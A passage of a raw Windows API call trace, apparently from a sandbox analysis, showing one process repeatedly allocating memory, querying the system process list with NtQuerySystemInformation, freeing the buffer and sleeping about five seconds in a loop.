ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.983] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.989] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.990] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.996] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.997] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.004] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.005] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.007] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.011] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.012] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.019] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.020] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.021] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.025] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.026] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.049] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.050] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.055] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.056] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.066] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.067] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.068] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.070] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.075] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.076] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.077] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.083] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.083] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.085] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.090] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.098] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.099] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.100] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.101] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.106] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.107] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.108] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.109] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.110] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.115] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.119] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.124] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.124] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.128] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.221] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.222] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.230] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.231] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.234] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.238] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.239] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.241] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.247] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.249] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, 